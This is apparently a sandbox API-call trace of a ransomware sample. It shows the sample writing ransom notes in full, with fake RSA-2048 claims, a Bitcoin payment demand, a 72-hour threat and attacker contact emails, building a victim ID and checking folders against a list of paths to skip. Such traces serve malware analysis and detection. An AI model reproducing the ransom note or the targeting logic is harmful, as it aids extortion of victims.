	[0178.990] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.990] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1
	[0178.991] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 0
	[0178.991] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.992] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.993] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\USOShared" | out: lpString1="C:\\Users\\All Users\\USOShared") returned="C:\\Users\\All Users\\USOShared"
	[0178.993] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\USOShared\\*.*") returned="C:\\Users\\All Users\\USOShared\\*.*"
	[0178.993] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.993] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.993] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\USOShared\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0178.993] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoshared\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.995] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.996] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.998] CloseHandle (hObject=0x380) returned 1
	[0178.999] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.999] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.001] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.001] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoshared\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.001] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.002] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.002] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.002] CloseHandle (hObject=0x380) returned 1
	[0179.002] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.002] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.003] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.003] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\USOShared\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0179.003] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoshared\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.007] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.007] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.010] CloseHandle (hObject=0x380) returned 1
	[0179.011] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.011] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.012] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.013] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.013] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoshared\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.013] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.013] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.013] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.014] CloseHandle (hObject=0x380) returned 1
	[0179.014] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOShared\\*.*" (normalized: "c:\\users\\all users\\usoshared\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x843a271f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0179.014] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\*.*") returned 32
	[0179.014] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.014] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\all users\\usoshared\\*.*") returned 0x20
	[0179.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.015] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="windows") returned 0x0
	[0179.015] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.015] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="boot") returned 0x0
	[0179.015] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.015] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="system volume information") returned 0x0
	[0179.015] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.015] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.016] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.016] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="temp") returned 0x0
	[0179.016] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.017] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="program files") returned 0x0
	[0179.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.017] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.017] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="appdata") returned 0x0
	[0179.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.018] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="application data") returned 0x0
	[0179.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.018] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="winnt") returned 0x0
	[0179.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.018] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="tmp") returned 0x0
	[0179.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.019] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="cache") returned 0x0
	[0179.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.019] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.019] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="webcache") returned 0x0
	[0179.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.019] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="inetcache") returned 0x0
	[0179.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.020] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="nvidia") returned 0x0
	[0179.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.020] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="packages") returned 0x0
	[0179.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.020] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="cookies") returned 0x0
	[0179.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.020] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\*.*", lpSrch="programdata") returned 0x0
	[0179.021] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.021] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.021] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x843a271f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.021] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.021] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843a271f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x843a271f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x843a271f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.021] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8437c4e9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8437c4e9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x843a271f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.021] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1
	[0179.021] lstrcmpW (lpString1="Logs", lpString2="..") returned 1
	[0179.021] lstrcmpW (lpString1="Logs", lpString2=".") returned 1
	[0179.022] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\USOShared" | out: lpString1="C:\\Users\\All Users\\USOShared") returned="C:\\Users\\All Users\\USOShared"
	[0179.022] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\") returned="C:\\Users\\All Users\\USOShared\\"
	[0179.022] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\", lpString2="Logs" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs") returned="C:\\Users\\All Users\\USOShared\\Logs"
	[0179.022] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\USOShared\\Logs" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs") returned="C:\\Users\\All Users\\USOShared\\Logs"
	[0179.022] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.022] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.022] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\*.*") returned="C:\\Users\\All Users\\USOShared\\Logs\\*.*"
	[0179.022] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\*.*" (normalized: "c:\\users\\all users\\usoshared\\logs\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0179.023] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\*.*") returned 37
	[0179.023] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.023] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\*.*", cchLength=0x25 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\*.*") returned 0x25
	[0179.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.023] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="windows") returned 0x0
	[0179.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.023] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="boot") returned 0x0
	[0179.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.024] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="system volume information") returned 0x0
	[0179.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.024] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.024] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="temp") returned 0x0
	[0179.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.024] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="program files") returned 0x0
	[0179.025] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.025] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.025] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.025] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="appdata") returned 0x0
	[0179.025] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.025] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="application data") returned 0x0
	[0179.025] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.026] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="winnt") returned 0x0
	[0179.026] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.026] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="tmp") returned 0x0
	[0179.026] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.026] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="cache") returned 0x0
	[0179.026] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.026] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.026] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.027] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="webcache") returned 0x0
	[0179.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.027] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="inetcache") returned 0x0
	[0179.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.027] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="nvidia") returned 0x0
	[0179.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.027] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="packages") returned 0x0
	[0179.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.028] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="cookies") returned 0x0
	[0179.028] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.028] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="programdata") returned 0x0
	[0179.028] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.028] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.001.etl", cAlternateFileName="UP2DAF~1.ETL")) returned 1
	[0179.028] lstrcmpW (lpString1="UpdateSessionOrchestration.001.etl", lpString2="..") returned 1
	[0179.028] lstrcmpW (lpString1="UpdateSessionOrchestration.001.etl", lpString2=".") returned 1
	[0179.029] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.029] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.001.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl"
	[0179.029] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl") returned 68
	[0179.029] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.029] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl") returned 0x44
	[0179.029] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl"
	[0179.029] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl") returned 68
	[0179.030] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.030] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.030] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.030] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
